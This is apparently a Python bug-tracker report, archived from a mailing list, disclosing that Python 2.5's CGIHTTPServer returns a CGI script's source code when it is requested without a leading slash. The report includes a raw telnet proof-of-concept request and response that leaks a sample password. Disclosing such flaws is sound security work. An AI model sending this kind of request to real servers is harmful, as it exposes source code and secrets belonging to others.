New submission from sumar: ================================================================================ Summary: ================================================================================ An information disclosure flaw exists in standard python CGIHTTPServer module. Bug is confirmed in python 2.5 @ fedora 7 (python-2.5-15.fc7).
================================================================================ Description: ================================================================================ Requesting cgi script (in example test.py) without / in the beginnig of URL cause return script content/code instead of script execution. It could lead to disclose some secret information eg. password. ================================================================================ Exploit code: ================================================================================ Connected to localhost. Escape character is '^]'. GET cgi-bin/test.py HTTP/1.0 HTTP/1.0 200 OK Server: SimpleHTTP/0.6 Python/2.5 Date: Fri, 07 Mar 2008 14:55:30 GMT Content-type: text/plain Content-Length: 150 Last-Modified: Fri, 07 Mar 2008 14:55:04 GMT #!/usr/bin/env python print 'Content-Type: text/html' print 'Cache-Control: no-cache' print print 'Hello' passwd='secret' path=/opt/myapp/secretpath Connection closed by foreign host. ================================================================================ correct request: ================================================================================ Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. GET /cgi-bin/test.py HTTP/1.0 HTTP/1.0 200 Script output follows Server: SimpleHTTP/0.6 Python/2.5 Date: Fri, 07 Mar 2008 15:01:03 GMT Content-Type: text/html Cache-Control: no-cache Hello Connection closed by foreign host. ================================================================================ ---------- components: Library (Lib) messages: 63361 nosy: m.sucajtys severity: normal status: open title: Python CGIHTTPServer information disclosure type: security versions: Python 2.5 __________________________________ Tracker <[EMAIL PROTECTED]> <http://bugs.python.org/issue2254> __________________________________ _______________________________________________ Python-bugs-list mailing list Unsubscribe: http://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com